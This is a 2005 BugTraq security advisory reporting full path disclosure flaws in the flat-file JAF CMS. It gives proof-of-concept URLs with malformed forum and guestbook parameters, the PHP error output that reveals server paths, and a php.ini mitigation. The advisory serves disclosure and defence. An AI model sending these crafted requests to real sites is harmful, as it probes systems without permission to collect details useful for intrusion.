BugTraq
[ECHO_ADV_20$2005] Full path disclosure JAF CMS Jun 23 2005 09:21AM
the_day echo or id
------------------------------------------------------------------------
---
[ECHO_ADV_20$2005] Full path disclosure JAF CMS
------------------------------------------------------------------------
---

Author: Dedi Dwianto
Date: June, 23th 2005
Location: Indonesia, Jakarta
Web: http://echo.or.id/adv/adv20-theday-2005.txt

------------------------------------------------------------------------
---

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : JAF CMS
version: < 3.0 Final
URL : http://jaf-cms.opensource-indonesia.com
Author : Salim "ph03y3nk"
Description :

JAF CMS - ...just another flat file CMS, is a Content Management System (CMS)
consist of a powerful set of PHP scripts that allow you to maintain personal
home page. There is no need for a database. The pages stored in a simple flat
file. I've coded this script because I realize that its hard to found server
(especially free space) offering PHP with database support already.

------------------------------------------------------------------------
---

Vulnerabilities:
~~~~~~~~~~~~~~~~

A. Full path disclosure:

A remote user can access the file directly to cause the system to display
an error message that indicates the installation path. The resulting error
message will disclose potentially sensitive installation path information
to the remote attacker.

* http://victim/index.php?page=forum&category=general&id=[id]/*

POC :

http://localhost/jaf-cms/index.php?page=forum&category=general&id=3/*

Warning: fopen(module/files/3/*): failed to open stream: No such file or directory
in /var/www/html/jaf-cms/module/forum/inc/csvfile.php on line 197

* http://victim/index.php?page=forum&view_type=topic&id=/*

POC :

http://localhost/jaf-cms/index.php?page=forum&view_type=topic&id=

Warning: fopen(module/files/): failed to open stream: Is a directory
in /var/www/html/jaf-cms/module/forum/inc/csvfile.php on line 197

* http://victim/index.php?page=guestbook&disp=[id]/*

POC :

http://victim/index.php?page=guestbook&disp=[id]/*

Notice: Undefined offset: 6 in /var/www/html/jaf-cm/module/guestbook/guestbook.php on line 250

B. Fix
report to vendor 21 June 2005
vendor No response

For User and do not know how to fix the script , change php.ini file setting
then turn on log_errors , and turn off display_error

------------------------------------------------------------------------
---

Shoutz:
~~~~~~~

~ y3dips, moby, comex, z3r0byt3, K-159, c-a-s-e, S`to, lirva32, anonymous
~ Lieur Euy , MSR
~ newbie_hacker (at) yahoogroups (dot) com [email concealed] ,
~ #e-c-h-o@DALNET

------------------------------------------------------------------------
---
Contact:
~~~~~~~~

the_day || echo|staff || the_day[at]echo[dot]or[dot]id
Homepage: http://theday.echo.or.id/

-------------------------------- [ EOF ] ----------------------------------

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus